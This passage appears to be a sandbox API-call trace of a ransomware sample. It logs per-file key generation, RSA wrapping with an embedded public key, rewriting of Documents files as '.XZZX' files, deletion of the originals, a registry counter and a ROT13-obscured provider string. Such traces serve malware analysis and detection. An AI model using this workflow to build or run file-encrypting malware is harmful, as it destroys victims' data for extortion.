pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0039.216] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.216] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.216] CryptDestroyKey (hKey=0x42e4ed0) returned 1 [0039.216] CryptReleaseContext (hProv=0x3e2d6d0, dwFlags=0x0) returned 0 [0039.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b0407b59334cdcaf9e2ca2e33779c0f7.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0039.217] WriteFile (in: hFile=0x498, lpBuffer=0x3e3ed28*, nNumberOfBytesToWrite=0x3de9, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e3ed28*, lpNumberOfBytesWritten=0x42ce438*=0x3de9, lpOverlapped=0x0) returned 1 [0039.217] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3de9 [0039.217] WriteFile (in: hFile=0x498, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.217] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3dee [0039.217] WriteFile (in: hFile=0x498, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x12, lpOverlapped=0x0) returned 1 [0039.217] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3e00 [0039.217] WriteFile (in: hFile=0x498, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.218] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3e05 [0039.218] SetErrorMode (uMode=0x1) returned 0x1 [0039.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0039.218] OutputDebugStringW (lpOutputString="end") [0039.218] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.218] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0039.218] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2d868) returned 1 [0039.218] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d868, dwCertEncodingType=0x1, pInfo=0x3dd2a88*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2ab8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2ac0*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e4ed0) returned 1 [0039.218] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.219] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0039.219] CryptEncrypt (in: hKey=0x42e4ed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0039.219] CryptEncrypt (in: hKey=0x42e4ed0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d8f0*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d8f0*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0039.219] WriteFile (in: hFile=0x498, lpBuffer=0x3e2d8f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d8f0*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0039.219] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0039.219] WriteFile (in: hFile=0x498, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.219] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0039.219] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0039.219] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x49c) returned 0x0 [0039.219] RegQueryValueExW (in: hKey=0x49c, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x1d, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0039.220] RegCloseKey (hKey=0x49c) returned 0x0 [0039.220] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x49c) returned 0x0 [0039.220] RegSetValueExW (in: hKey=0x49c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x1e, cbData=0x4 | out: lpData=0x42cdfec*=0x1e) returned 0x0 [0039.220] RegCloseKey (hKey=0x49c) returned 0x0 [0039.220] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.220] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.220] CloseHandle (hObject=0x498) returned 1 [0039.221] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0039.221] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0039.221] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_P_aT.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_p_at.odt")) returned 1 [0039.222] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_P_aT.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_p_at.odt")) returned 0 Thread: id = 123 os_tid = 0x8fc Thread: id = 125 os_tid = 0x328 [0039.121] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.121] lstrcpyW (in: lpString1=0x46cf460, lpString2="-tHIa9_.xls" | out: lpString1="-tHIa9_.xls") returned="-tHIa9_.xls" [0039.121] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.121] SetErrorMode (uMode=0x1) returned 0x1 [0039.121] lstrcpyW (in: lpString1=0x46cf860, lpString2="-tHIa9_.xls" | out: lpString1="-tHIa9_.xls") returned="-tHIa9_.xls" [0039.121] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0x836159f0, Data2=0x3515, Data3=0x4a54, Data4=([0]=0x8e, [1]=0x25, [2]=0x90, [3]=0xde, [4]=0xed, [5]=0x45, [6]=0x56, [7]=0x3f))) returned 0x0 [0039.121] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\-tHIa9_.xls") returned 76 [0039.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0039.121] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EE9B10B00F697CE4836159F013D6612C.XZZX") returned 102 [0039.121] StrStrW (lpFirst="-tHIa9_.xls", lpSrch="XZZX") returned 0x0 [0039.121] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\-tHIa9_.xls", dwFileAttributes=0x20) returned 1 [0039.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\-tHIa9_.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\-thia9_.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0039.122] ReadFile (in: hFile=0x48c, lpBuffer=0x42e9120, nNumberOfBytesToRead=0x13b95, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e9120*, lpNumberOfBytesRead=0x46ce418*=0x13b95, lpOverlapped=0x0) returned 1 [0039.123] CloseHandle (hObject=0x48c) returned 1 [0039.123] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4180000 [0039.123] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4190000 [0039.124] SetErrorMode (uMode=0x1) returned 0x1 [0039.124] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0039.124] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d6d0) returned 1 [0039.127] CryptGenKey (in: hProv=0x3e2d6d0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5050) returned 1 [0039.247] CryptExportKey (in: hKey=0x42e5050, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0039.247] CryptExportKey (in: hKey=0x42e5050, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4190000, pdwDataLen=0x46ce41c | out: pbData=0x4190000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0039.247] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.247] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0039.247] CryptDestroyKey (hKey=0x42e5050) returned 1 [0039.247] CryptReleaseContext (hProv=0x3e2d6d0, dwFlags=0x0) returned 0 [0039.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EE9B10B00F697CE4836159F013D6612C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ee9b10b00f697ce4836159f013d6612c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0039.248] WriteFile (in: hFile=0x478, lpBuffer=0x42e9120*, nNumberOfBytesToWrite=0x13b95, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x42e9120*, lpNumberOfBytesWritten=0x46ce438*=0x13b95, lpOverlapped=0x0) returned 1 [0039.249] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13b95 [0039.249] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.249] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13b9a [0039.249] WriteFile (in: hFile=0x478, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x16, lpOverlapped=0x0) returned 1 [0039.249] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13bb0 [0039.249] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.249] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13bb5 [0039.249] SetErrorMode (uMode=0x1) returned 0x1 [0039.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0039.249] OutputDebugStringW (lpOutputString="end") [0039.250] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.250] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0039.250] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x3e2d978) returned 1 [0039.250] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d978, dwCertEncodingType=0x1, pInfo=0x3dd2748*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2778*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2780*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x42e5050) returned 1 [0039.250] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0039.251] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0039.251] CryptEncrypt (in: hKey=0x42e5050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0039.251] CryptEncrypt (in: hKey=0x42e5050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2da00*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2da00*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0039.251] WriteFile (in: hFile=0x478, lpBuffer=0x3e2da00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2da00*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0039.251] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0039.251] WriteFile (in: hFile=0x478, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0039.251] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0039.251] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0039.251] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x480) returned 0x0 [0039.251] RegQueryValueExW (in: hKey=0x480, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x1e, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0039.251] RegCloseKey (hKey=0x480) returned 0x0 [0039.251] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x480) returned 0x0 [0039.251] RegSetValueExW (in: hKey=0x480, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x1f, cbData=0x4 | out: lpData=0x46cdfec*=0x1f) returned 0x0 [0039.251] RegCloseKey (hKey=0x480) returned 0x0 [0039.251] VirtualFree (lpAddress=0x4180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.252] VirtualFree (lpAddress=0x4190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0039.252] CloseHandle (hObject=0x478) returned 1 [0039.253] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0039.253] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0039.253] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\-tHIa9_.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\-thia9_.xls")) returned 1 [0039.254] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\-tHIa9_.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\-thia9_.xls")) returned 0 Thread: id = 126 os_tid = 0x218 [0039.259] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0039.259] lstrcpyW (in: lpString1=0x42cf460, lpString2="Gg8kaToejw.xls" | out: lpString1="Gg8kaToejw.xls") returned="Gg8kaToejw.xls" [0039.259] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0039.259] SetErrorMode (uMode=0x1) returned 0x1 [0039.259] lstrcpyW (in: lpString1=0x42cf860, lpString2="Gg8kaToejw.xls" | out: lpString1="Gg8kaToejw.xls") returned="Gg8kaToejw.xls" [0039.259] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x6d832a0d, Data2=0xd0fa, Data3=0x4dfd, Data4=([0]=0xbe, [1]=0x51, [2]=0x97, [3]=0xce, [4]=0x39, [5]=0x39, [6]=0xbe, [7]=0x31))) returned 0x0 [0039.259] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\Gg8kaToejw.xls") returned 79 [0039.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0039.259] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned 102 [0039.259] StrStrW (lpFirst="Gg8kaToejw.xls", lpSrch="XZZX") returned 0x0 [0039.259] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\Gg8kaToejw.xls", dwFileAttributes=0x20) returned 1 [0039.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\Gg8kaToejw.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\gg8katoejw.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0039.260] ReadFile (in: hFile=0x460, lpBuffer=0x3e45838, nNumberOfBytesToRead=0x5cc4, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e45838*, lpNumberOfBytesRead=0x42ce418*=0x5cc4, lpOverlapped=0x0) returned 1 [0039.260] CloseHandle (hObject=0x460) returned 1 [0039.260] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0039.260] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0039.260] SetErrorMode (uMode=0x1) returned 0x1 [0039.260] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg 